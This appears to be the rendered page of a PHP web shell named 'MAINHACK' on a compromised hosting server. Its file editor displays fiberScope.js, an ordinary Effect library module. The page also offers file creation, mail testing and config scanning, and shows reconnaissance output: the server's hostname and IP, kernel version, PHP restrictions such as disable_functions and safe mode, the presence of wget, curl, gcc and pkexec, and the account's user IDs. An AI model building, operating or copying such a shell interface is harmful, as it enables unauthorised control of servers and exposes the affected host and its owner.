[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: fiberScope.js
import * as FiberId from "../FiberId.js"; import { globalValue } from "../GlobalValue.js"; import * as FiberMessage from "./fiberMessage.js"; /** @internal */ const FiberScopeSymbolKey = "effect/FiberScope"; /** @internal */ export const FiberScopeTypeId = /*#__PURE__*/Symbol.for(FiberScopeSymbolKey); /** @internal */ class Global { [FiberScopeTypeId] = FiberScopeTypeId; fiberId = FiberId.none; roots = /*#__PURE__*/new Set(); add(_runtimeFlags, child) { this.roots.add(child); child.addObserver(() => { this.roots.delete(child); }); } } /** @internal */ class Local { fiberId; parent; [FiberScopeTypeId] = FiberScopeTypeId; constructor(fiberId, parent) { this.fiberId = fiberId; this.parent = parent; } add(_runtimeFlags, child) { this.parent.tell(FiberMessage.stateful(parentFiber => { parentFiber.addChild(child); child.addObserver(() => { parentFiber.removeChild(child); }); })); } } /** @internal */ export const unsafeMake = fiber => { return new Local(fiber.id(), fiber); }; /** @internal */ export const globalScope = /*#__PURE__*/globalValue(/*#__PURE__*/Symbol.for("effect/FiberScope/Global"), () => new Global()); //# sourceMappingURL=fiberScope.js.map
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344